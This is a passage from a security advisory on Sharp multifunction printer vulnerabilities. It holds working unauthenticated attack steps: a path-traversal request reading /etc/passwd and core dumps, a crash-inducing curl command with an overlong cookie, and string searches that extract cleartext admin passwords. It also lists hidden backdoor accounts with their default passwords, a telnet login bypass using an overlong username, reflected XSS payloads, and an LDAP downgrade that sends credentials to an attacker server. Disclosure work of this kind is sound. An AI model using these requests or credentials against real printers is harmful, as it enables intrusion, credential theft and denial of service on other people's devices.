May 11 12:32 core-main.log.gz.004 -rw-r--r-- 1 root root 20440117 May 11 12:28 core-main.log.gz.005 -rw-r--r-- 1 root root 22170528 May 10 11:47 core-main.log.gz.006 -rw-r--r-- 1 root root 0 Jan 1 2000 core-main.log.gz.007 ... sh-4.3# cd /mnt/log && ls -la|grep ERR -rw-r--r-- 1 root root 0 May 15 14:11 ERR_IFS.log -rw-r--r-- 1 root root 17316180 May 15 14:11 ERR_core-main.log.gz -rw-r--r-- 1 root root 0 May 15 14:11 ERR_core-pdl.log.gz -rw-r--r-- 1 root root 97316 May 15 14:11 ERR_kern.log -rw-r--r-- 1 root root 0 May 15 14:11 ERR_log_ui_mainview.log -rw-r--r-- 1 root root 314188 May 15 14:11 ERR_main.log -rw-r--r-- 1 root root 315 May 15 14:11 ERR_nf.log -rw-r--r-- 1 root root 21262 May 15 14:11 ERR_pdl.log sh-4.3#The files are world-readable and contain valid coredump files as shown below: kali% file core-main.log core-main.log: ELF 32-bit LSB core file, ARM, version 1 (SYSV),SVR4-style, from '/tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask-nodlychk', real uid: 0, effective uid: 0, real gid: 0, effectiveThe core file contains in clear-text:- - session IDs;- - password for all the users (even when the printer booted and nouser logged into the printer (!));- - emails;- - Encryption keys.For example, some keys: kali% strings core-main.log|grep -A 4 -B 4 ENCRYPT_KEY CloudPollingConst VENDOR_KEY YiqUwHIymoiuwFPjja04u+Q+zeokggNSuYv4g+axNAIx4vwnnrPmfsFrAsqZr4RFeR6EgwWRvzgledwTz9MZAw== TENANT_ENCRYPT_KEY GMuQt[REDACTED]The core file contains the password (`PASS-PIERRE`) of the admin usereven when the admin user has not been logged-in the printer since theprinter booted: kali% zcat core-main.log.gz.001 | strings | grep PASS-PIERRE PASS-PIERREAll the clear-text passwords can be found inside the core file: kali% zcat core-main.log.gz.001 | strings | less /mnt/std01/ACCBURS/ /mnt/std04/ACC/BROWSER/BROWSER_NONUSR /mnt/std01/ACC/AccBackUp/BROWSER_NONUSR /mnt/std01/ACC/AccUserInfo /mnt/std04/ACC /mnt/std01/ACC/AccUserInfo2 /mnt/std04/ACC/BROWSER /mnt/std01/ACC/AccGrpPrmtInfo /mnt/std01/ACCBURS /mnt/std01/ACC/AccFlashUserCounter /mnt/std01/ACC/AccFlashBackUp /mnt/std01/ACC/AccTotalPix /mnt/std01/ACC/AccBackUp/JobInfo Other User Other Vender Vender Administrator admin PASS-PIERRE <------------------- clear-text password for admin Service service service User users users Vender2 Vender2 FSS User servicefss servicefss System Operator sysadmin sysadmin Device Account deviceaccount deviceaccount /mnt/std01/ACC/AccGrpHomeInfo /mnt/std01/ACC/AccBackUp /mnt/std01/ACC /mnt/std01/ACC/AccUserPixel /mnt/std01/ACC/BROWSER /mnt/std01/ACC/AccGrpCstmInfoThere is no encryption for the /mnt/log partition: sh-4.3# df -h /mnt/log Filesystem Size Used Avail Use% Mounted on /dev/mmcblk0p3 791M 145M 589M 20% /mnt/log sh-4.3#All the passwords can be found inside the core file after the printerjust booted and no user logged: this is abnormal and shows theauthentication mechanism is incorrectly implemented.A local attacker can extract all the passwords.A remote attacker using an additional vulnerability (e.g. Local FileInclusion) can recover all the passwords and compromise the printer(see the next vulns).## Details - Arbitrary Directory Listing without authenticationIt was observed that Sharp printers are vulnerable to an arbitrarydirectory listing without authentication. Any attacker can list anydirectory located in the printer and recover any file.It is possible to list the manual index files by visiting the`/installed_emanual_list.html` without authentication:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]By changing the folder argument in the address, it is possible tobrowse the entire file systems of the printer.Request to `installed_emanual_list.html?folder=../../../` will listthe `/` file system:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]Files located in /etc:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]Using the vulnerability [Local File Inclusion allowing to read anyfile (e.g. Coredump files), it is then possible to download any file.An attacker can browse the file systems of the printers and download any file.A remote attacker can recover all the passwords by downloadingcoredump files and compromise the printer.## Details - Local File Inclusion allowing to read any file (e.g.Coredump files) without authenticationIt was observed that Sharp printers are vulnerable to a local fileinclusion without authentication. Any attacker can read any filelocated in the printer.Normal request to retrieve the manual index files:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]By default, the manual index files are located in /mnt/std_data/manualinside the printer: sh-4.3# pwd /mnt/std_data/manual sh-4.3# ls -la MX-M4071_inch_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M4071_inch_web.idx sh-4.3# ls -la total 233 drwxrwxr-x 4 1000 pulse 2536 Jul 31 2020 . drwxr-xr-x 9 root root 4096 Mar 1 2022 .. -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_ab_web.idx -rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M2651_aus_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_canada_web.idx -rw-rw-r-- 1 1000 pulse 9590 Jul 30 2020 MX-M2651_europe_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_inch_web.idx -rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M2651_uk_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_usa_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M3051_ab_web.idx -rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M3051_aus_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M3051_canada_web.idx -rw-rw-r-- 1 1000 pulse 9590 Jul 30 2020 MX-M3051_europe_web.idxThe normal request is: GET /installed_emanual_down.html?path=/manual/MX-M4071_inch_web.idx HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1The `path=` argument can be manipulated to retrieve any file in theprinter. The session cookie is not required as this vulnerability doesnot require authentication:For example, retrieving /etc/passwd: GET /installed_emanual_down.html?path=/manual/../../../etc/passwd HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]It is possible to generate a coredump file, download it and extractcredentials to remotely compromise the printer without credentialsusing this vulnerability along with the vulnerabilities:- - Invalid (0x000000d0) pointer dereference - Remote DoS without authentication- - Memory corruption in the main program - Remote Code Executionagainst the web server without authentication- - World-readable coredump files and insecure storage of credentials### Generation of the coredump file on the printerUsing the HTTP request: kali% var=`perl -e "print 'A'x639"`; curl -v -b"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB >### Local File Inclusion of the coredump fileWe download the coredump file using the Local File Inclusion: kali% curl -i -s -k -X $'GET' \ -H $'Host: 10.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linuxx86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip,deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'http://10.0.0.1/installed_emanual_down.html?path=/manual/../../../mnt/log/core-main.log.gz.001'> core-main.log.gz.001 kali% ls -la total 16920 drwx------ 2 user user 4096 May 15 10:13 . drwx------ 6 user user 4096 May 15 10:13 .. -rw------- 1 user user 17316455 May 15 10:13 core-main.log.gz.001 kali% head -n 9 core-main.log.gz.001 HTTP/1.1 200 OK Server: Rapid Logic/1.1 MIME-version: 1.0 Date: Thu Jan 1 00:02:12 1970 GMT Content-Type: application/octet-stream; name=core-main.log.gz.001 Content-disposition: attachment; filename=core-main.log.gz.001 Content-Length: 17316180 Connection: closeWe remove the first 9 lines from the core file (corresponding to HTTPheaders) to generate a valid gzip file: kali% vi core-main.log.gz.001 kali% file core-main.log.gz.001 core-main.log.gz.001: gzip compressed data, last modified: Mon May15 14:09:45 2023, from Unix, original size modulo 2^32 176379936 gzipcompressed data, reserved method, ASCII, has CRC, has comment,encrypted, from FAT filesystem (MS-DOS, OS/2, NT), original sizemodulo 2^32 176379936 kali%### Retrieve of credentials using the coredump filesThe core file contains the password (`PASS-PIERRE`) of the admin usereven when the admin user has not been logged-in to the printer sincethe printer booted:All the passwords can be found inside the core file, located near the`admin` string: kali% zcat core-main.log.gz.001 | strings | less /mnt/std01/ACCBURS/ /mnt/std04/ACC/BROWSER/BROWSER_NONUSR /mnt/std01/ACC/AccBackUp/BROWSER_NONUSR /mnt/std01/ACC/AccUserInfo /mnt/std04/ACC /mnt/std01/ACC/AccUserInfo2 /mnt/std04/ACC/BROWSER /mnt/std01/ACC/AccGrpPrmtInfo /mnt/std01/ACCBURS /mnt/std01/ACC/AccFlashUserCounter /mnt/std01/ACC/AccFlashBackUp /mnt/std01/ACC/AccTotalPix /mnt/std01/ACC/AccBackUp/JobInfo Other User Other Vender Vender Administrator admin PASS-PIERRE <--------------------- clear-text password for admin Service service service User users users Vender2 Vender2 FSS User servicefss servicefss System Operator sysadmin sysadmin Device Account deviceaccount deviceaccount /mnt/std01/ACC/AccGrpHomeInfo /mnt/std01/ACC/AccBackUp /mnt/std01/ACC /mnt/std01/ACC/AccUserPixel /mnt/std01/ACC/BROWSER /mnt/std01/ACC/AccGrpCstmInfo### Retrieve of credentials using configuration filesThe configuration files containing the credentials can be found in the/mnt/std04/DBMS/uaccnt.When a password is updated, the files present in`/mnt/std04/DBMS/uaccnt/*` will be updated. It is possible to retrievesome credentials from these files: sh-4.3# pwd /mnt/std04/DBMS/uaccnt sh-4.3# hexdump -C 9.01 00000000 ff ff ff bf ff ff ff ff ff ff ff ff ff ff ff ff|................| 00000010 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff|................| [...] 00005010 61 64 6d 69 6e 02 00 00 00 00 d0 00 00 64 65 76|admin........dev| 00005020 69 63 65 61 63 63 6f 75 6e 74 09 00 00 00 00 50|iceaccount.....P| 00005030 00 00 4f 74 68 65 72 01 00 00 00 00 70 00 00 73|..Other.....p..s| 00005040 65 72 76 69 63 65 04 00 00 00 07 30 00 00 66 73|ervice.....0..fs| 00005050 73 07 00 00 00 01 70 00 00 79 73 61 64 6d 69 6e|s.....p..ysadmin| 00005060 08 00 00 00 00 50 00 00 75 73 65 72 73 05 00 00|.....P..users...| 00005070 00 00 60 00 00 56 65 6e 64 65 72 03 00 00 00 06|..`..Vender.....| 00005080 10 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00|...2............| 00005090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|................| [...] sh-4.3#An attacker can download these files and analyze them to retrieve the passwords.## Details - Backdoor webpage - Listing of session cookies withoutauthenticationIt was observed that Sharp printers are vulnerable to a listing ofsession cookies without authentication. Any attacker can list validcookies by visiting a backdoor webpage and use them to authenticate tothe printers.It is possible to list the `MFPSESSIONID` session cookies by visitingthe `/sessionlist.html` webpage without authentication:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]It is also possible to use curl from another machine: kali% curl -kv http://10.0.0.1/sessionlist.html [...] <h2>Session list</h2> <table class="matrix"> <tr> <th>No.</th> <th>User</th> <th>From</th> <th>Last login</th> <th>Last access</th> <th>Language ID</th> <th>Cookie</th> </tr> <tr> <td>0000</td> <td>Administrator</td> <td>10.0.0.10</td> <td>2023/05/16(Tue) 13:35:38</td> <td>2023/05/16(Tue) 13:35:38</clearTOStd> <td>02</td><td>MFPSESSIONID=0200736B459709ABA789505BF27D765756D39B82B7ADE25E302820230516133538428B5C9D</td> </tr> </table> [...]An attacker can retrieve valid session cookies and compromise the printer.Note that a victim user must have been logged inside the printer priorto this attack in order to retrieve the corresponding session cookies.## Details - Configuration webpages reachable without authenticationIt was observed that some authenticated webpages are reachable withoutauthentication on Sharp printers. Any attacker can modify parameterson these webpages without authentication.A list of webpages supposed to require authentication but reachablewithout authentication is listed below:- - /address_smime_install.html- - /send_fax_fcode_entry.html- - /send_fax_fcode_entry_relay.html- - /send_fax_fcode.html- - /send_inbound_address_entry.html- - /send_inbound_entry.html- - /send_inbound.html- - /send_receive_fw.html- - /printer_ps.htmlFor example, `/printer_ps.html`:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]An attacker can modify parameters of the printers without authentication.The vendor confirmed this is the attended behavior.## Details - Reboot without authentication - Remote DoSIt was observed that a specific webpage is reachable withoutauthentication on Sharp printers. Any attacker can use this webpage toreboot the printer.It is possible to reboot the printer by visiting the/sys_trayentryreboot.html without authentication.When confirming the `Reboot Now` action, the printer will reboot:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The printer will then reboot and will be unreachable for some minutes: PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data. ^C --- 10.0.0.1 ping statistics --- 5 packets transmitted, 0 received, 100% packet loss, time 4083msAn attacker can DoS the printer by rebooting it indefinitely.## Details - Backdoor access - ServiceSharp printers are configured with default credentials. Some accountsare hidden and can be abused by attackers to compromise the printers.When analyzing the configuration of the printers, it appears there areseveral accounts visible on the web interface:- - `Administrator` (uid 3)- - `System Administrator` (uid 8, as `System Operator`)- - `User` (uid 5)- - `Device Account` (uid 9)- - `Other User` (uid 1)After doing reverse engineering, the default passwords have been obtained:- - System Administrator: sysadmin- - User: users- - Device Account: deviceaccount- - Other User: OtherThe Service account (corresponding to uid 4) does not appear on theuser list, is not documented and allows an attacker to change theconfiguration of the printers and update the firmware image. Thepassword for Service is `service`.Several webpages can be found corresponding to this service user:- - /devicecloning_pp.html- - /devicecloning.html- - /service_ura_status_page.html- - /service_testpage_ok.html- - /service_testpage.html- - /service_syslog_view.html- - /service_syslog_settings_storage.html- - /service_syslog_settings_server.html- - /service_syslog_setting.html- - /service_syslog_select.html- - /service_syslog_save.html- - /service_syslog_download.html- - /service_softsw.html- - /service_reboot.html- - /serfildata_savepc.html- - /service_account.html- - /service_admin.html- - /service_device_cloning.html- - /service_filingdata.html- - /service_testpage.html- - /service_firm.html- - /service_testpage.html- - /service_font_down.html- - /service_joblog.html- - /service_joblog_list.html- - /service_joblog_download.html- - /service_joblog_select.html- - /service_joblog_list_download.html- - /service_machineid.html- - /service_password.html- - /sys_paperproperty.html- - /sys_paperproperty_entry.htmlListing of users:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The service account can be discovered by visiting the webpagehttp://[ip]/account_user_entry.html?userid=-4 but the informationcannot be edited:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The `service` account can be used to change the configuration of theprinter. The default webpage is http://[ip]/service_testpage.html andprovides access to a lot of hidden functionalities:- - Device Cloning- - Update of the firmware image to insert a malicious firmware image- - Export settings- - Configuration of the log server (disabling the logs, erasing the logs, ...)Device cloning:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]Update of the firmware:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]An attacker can use this additional backdoor account to compromise the printers.## Details - Backdoor access - FSS UserSharp printers are configured with default credentials. Some accountsare hidden and can be abused by attackers to compromise the printers.When analyzing the configuration of the printers, it appears there areseveral accounts visible on the web interface:- - `Administrator` (uid 3)- - `System Administrator` (uid 8, as `System Operator`)- - `User` (uid 5)- - `Device Account` (uid 9)- - `Other User` (uid 1)After doing reverse engineering, the default passwords have been obtained:- - System Administrator: sysadmin- - User: users- - Device Account: deviceaccount- - Other User: OtherThe FSS User account (corresponding to uid 7) does not appear on theuser list, is not documented and allows an attacker to change theconfiguration of the printers and update the firmware image.The password for FSS User is `servicefss`.The FSS User has also admin privileges.Several webpages can be found corresponding to this service user:- - /fss_default.html- - /fss.html- - /fss_password.html- - /fss_account.html- - /fss_backup_export.html- - /fss_backup.html- - /fss_backup_reboot.htmlThe service account can be discovered by visiting the webpagehttp://[ip]/account_user_entry.html?userid=-7 but the informationcannot be edited:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The FSS User account can be used to change the configuration of theprinter. The default webpage is http://[ip]/fss.html and providesaccess to hidden functionalities related to the support and a blindSSRF vulnerability:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]Reboot of the printer:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]An attacker can use this additional backdoor account to compromise the printers.## Details - Insecure default credentialsSharp printers are configured with default and insecure credentials.When doing reverse engineering against the `main` binary locatedinside the Sharp firmware image, we can extract the list of passwordsfor:- - `Administrator` / `admin`- - `Other User` / `Other`- - `Device Account` / `deviceaccount`- - `FSS User` / `servicefss`- - `Service` / `service`- - `User` / `users`- - `System Operator` / `sysadmin`Listing of username when analyzing main:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The listing of users can be retrieved from the web interface, usingthe admin user:- - `Other User` - http://[ip]/account_user_entry.html?userid=-1- - `Vender` - http://[ip]/account_user_entry.html?userid=-2- - `Administrator` - http://[ip]/account_user_entry.html?userid=-3- - `Service` - http://[ip]/account_user_entry.html?userid=-4- - `User` - http://[ip]/account_user_entry.html?userid=-5- - `Vender2` - http://[ip]/account_user_entry.html?userid=-6- - `FSS User` - http://[ip]/account_user_entry.html?userid=-7, withadmin privileges- - `System Operator` - http://[ip]/account_user_entry.html?userid=-8- - `Device Account` - http://[ip]/account_user_entry.html?userid=-9,with admin privilegesAn attacker can use these default accounts to compromise the printers.The vendor confirmed this is the attended behavior.## Details - read admin access on telnetIt is possible to bypass the authentication of the telnet server ofany Sharp Printer (running any firmware version) by specifying aninvalid user.This authentication bypass provides an attacker with a full READ adminaccess to the printer.Without the corresponding password of the admin user, the access will be denied: kali% telnet 10.0.0.1 Trying 10.0.0.1... Connected to 10.0.0.1. Escape character is '^]'. SHARP MX-M365N Ver 01.06.00.0h.19 TELNET server. Copyright(C) 2005- SHARP CORPORATION Copyright(C) 2005- silex technology, Inc. login: admin 'admin' user needs password to login. password: Login incorrect. Connection closed by foreign host. kali%It is possible to send an invalid username (e.g.`adminAAAAAAAAAAAAAAAA[...]`) to bypass the authentication and getREAD access with admin privileges: kali% telnet 10.0.0.1 Trying 10.0.0.1... Connected to 10.0.0.1. Escape character is '^]'. SHARP MX-M365N Ver 01.06.00.0h.19 TELNET server. Copyright(C) 2005- SHARP CORPORATION Copyright(C) 2005- silex technology, Inc. login: adminAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA User 'adminAAA' logged in. No. Item Value (level.1) ---------------------------------------------------------------------- 1 : Configure General 2 : Configure TCP/IP 3 : Configure NetWare 4 : Configure AppleTalk 5 : Configure NetBIOS 6 : Configure AP I/F 7 : Configure Gateway 97 : Display Status 98 : Reset Settings to Defaults 99 : Exit Please select(1 - 99)? 1 No. Item Value (level.2) ---------------------------------------------------------------------- 1 : Print status page after bootup : NO 2 : SSL Mode : ALL 3 : Rendezvous Enable : ENABLE 4 : Rendezvous Name : "MX-M365N" 5 : SMBC Enable : ENABLE 6 : 802.1X auth 7 : Frame Size : 1514 8 : SMB Authentication Flags : 15 99 : Back to prior menu Please select(1 - 99)? 99 No. Item Value (level.1) ---------------------------------------------------------------------- 1 : Configure General 2 : Configure TCP/IP 3 : Configure NetWare 4 : Configure AppleTalk 5 : Configure NetBIOS 6 : Configure AP I/F 7 : Configure Gateway 97 : Display Status 98 : Reset Settings to Defaults 99 : Exit Please select(1 - 99)?## Details - XSS on the /login.html pageThere are 2 reflected XSS vulnerabilities located in the `/login.html` webpage.HTTP request sent to `/login.html`, with the query string containingthe payload `<XSS>";alert('XSS');"`:The first XSS appears on the response on line 32:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The second XSS appears on the response on line 183:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]## Details - XSS on all other HTML pagesThere are 3 reflected XSS vulnerabilities located in all the html webpages.An attacker can send a HTTP request to any HTML webpage with the querystring containing `";alert(1);<XSS>` to trigger:- - 2 JavaScript-based XSS- - 1 HTML based XSSThe HTTP request is sent to `/main.html`, with the query stringcontaining the payload `";alert(1);<XSS>`:The first XSS appears on the response on line 32:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The second XSS appears on the response on line 87:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The third XSS appears on the response on line 221:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]- From the tests, all the HTML webpages are vulnerable to these 3 XSS.## Details - Exfiltration of LDAP credentials by downgrading the securitySharp printers can be configured with a connection to a LDAP server,with credentials.While the LDAP password is not shown on the web interface, an attackerwith the admin password can retrieve the password by downgrading theauthentication type to `SIMPLE`, which will enable clear-textcommunication to a malicious server.With the `Connect Test`, an attacker can downgrade the security of theauthentication to `SIMPLE` and retrieve the password in clear-text byspecifying a malicious OpenLDAP server:LDAP Configuration - http://10.0.0.1/nw_ldap_entry.html?ldapid=0:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]With a malicious OpenLDAP server receiving the connection, thepassword will be displayed in the logs: kali# /usr/sbin/slapd -d 10 -f /etc/ldap/slapd.conf -h "ldap:/// ldaps:///" 6458d55e.3103c227 0x7fe72981e200 @(#) $OpenLDAP: slapd2.5.13+dfsg-5 (Feb 8 2023 01:56:12) $ Debian OpenLDAP Maintainers<[email protected]> 6458d55e.319e91af 0x7fe72981e200 slapd starting 6458d55e.31a5bad7 0x7fe727bff6c0 daemon: added 4r listener=(nil) 6458d55e.31a6707c 0x7fe727bff6c0 daemon: added 7r listener=0x5586390ead60 6458d55e.31a6b53d 0x7fe727bff6c0 daemon: added 8r listener=0x5586390eae30 6458d55e.31a6f00d 0x7fe727bff6c0 daemon: added 9r listener=0x5586390ea740 6458d55e.31a7661d 0x7fe727bff6c0 daemon: added 10r listener=0x5586390ea810 6458d55e.31a94b33 0x7fe727bff6c0 daemon: epoll: listen=7active_threads=0 tvp=zero 6458d55e.31a96f6a 0x7fe727bff6c0 daemon: epoll: listen=8active_threads=0 tvp=zero 6458d55e.31a97916 0x7fe727bff6c0 daemon: epoll: listen=9active_threads=0 tvp=zero 6458d55e.31a981b7 0x7fe727bff6c0 daemon: epoll: listen=10active_threads=0 tvp=zero 6458d55e.31a9933f 0x7fe727bff6c0 daemon: activity on 1 descriptor 6458d55e.31a99baf 0x7fe727bff6c0 daemon: activityon:6458d55e.31a9a375 0x7fe727bff6c0 6458d55e.31a9b6dc 0x7fe727bff6c0 daemon: epoll: listen=7active_threads=0 tvp=zero 6458d55e.31a9d392 0x7fe727bff6c0 daemon: epoll: listen=8active_threads=0 tvp=zero 6458d55e.31a9dc6e 0x7fe727bff6c0 daemon: epoll: listen=9active_threads=0 tvp=zero 6458d55e.31a9f2b6 0x7fe727bff6c0 daemon: epoll: listen=10active_threads=0 tvp=zero 6458d562.355e84dc 0x7fe727bff6c0 daemon: activity on 1 descriptor 6458d562.355f3b42 0x7fe727bff6c0 daemon: activityon:6458d562.355f593f 0x7fe727bff6c0 6458d562.355fde77 0x7fe727bff6c0 daemon: epoll: listen=7 busy 6458d562.355ffeb9 0x7fe727bff6c0 daemon: epoll: listen=8active_threads=0 tvp=zero 6458d562.35601b67 0x7fe727bff6c0 daemon: epoll: listen=9active_threads=0 tvp=zero 6458d562.3560372e 0x7fe727bff6c0 daemon: epoll: listen=10active_threads=0 tvp=zero 6458d562.35638596 0x7fe7273fe6c0 daemon: accept() = 14 6458d562.35646744 0x7fe7273fe6c0 daemon: listen=7, new connection on 14 6458d562.3564fc1e 0x7fe727bff6c0 daemon: activity on 1 descriptor 6458d562.35656f57 0x7fe727bff6c0 daemon: activityon:6458d562.35658b4c 0x7fe727bff6c0 6458d562.3565d7f5 0x7fe727bff6c0 daemon: epoll: listen=7active_threads=0 tvp=zero 6458d562.3565fb50 0x7fe727bff6c0 daemon: epoll: listen=8active_threads=0 tvp=zero 6458d562.356615c1 0x7fe727bff6c0 daemon: epoll: listen=9active_threads=0 tvp=zero 6458d562.35662d31 0x7fe727bff6c0 daemon: epoll: listen=10active_threads=0 tvp=zero 6458d562.35691b42 0x7fe7273fe6c0 daemon: added 14r (active) listener=(nil) 6458d562.356a5b81 0x7fe727bff6c0 daemon: activity on 2 descriptors 6458d562.356b0c68 0x7fe727bff6c0 daemon: activityon:6458d562.356b54fa 0x7fe727bff6c0 14r6458d562.356b948e0x7fe727bff6c0 6458d562.356bfc9e 0x7fe727bff6c0 daemon: read active on 14 6458d562.356ce70e 0x7fe727bff6c0 daemon: epoll: listen=7active_threads=0 tvp=zero 6458d562.356d5571 0x7fe727bff6c0 daemon: epoll: listen=8active_threads=0 tvp=zero 6458d562.356db465 0x7fe727bff6c0 daemon: epoll: listen=9active_threads=0 tvp=zero 6458d562.356e155f 0x7fe727bff6c0 daemon: epoll: listen=10active_threads=0 tvp=zero 6458d562.356f5783 0x7fe7273fe6c0 ldap_read: want=8, got=8 6458d562.356f9399 0x7fe7273fe6c0 0000: 30 31 02 01 01 01 01 01 01...... 6458d562.356fd33a 0x7fe7273fe6c0 ldap_read: want=43, got=43 6458d562.3570169a 0x7fe7273fe6c0 0000: 01 03 04 15 6c 64 61 702d 63 72 65 64 73 35 40 ....ldap-creds5@ 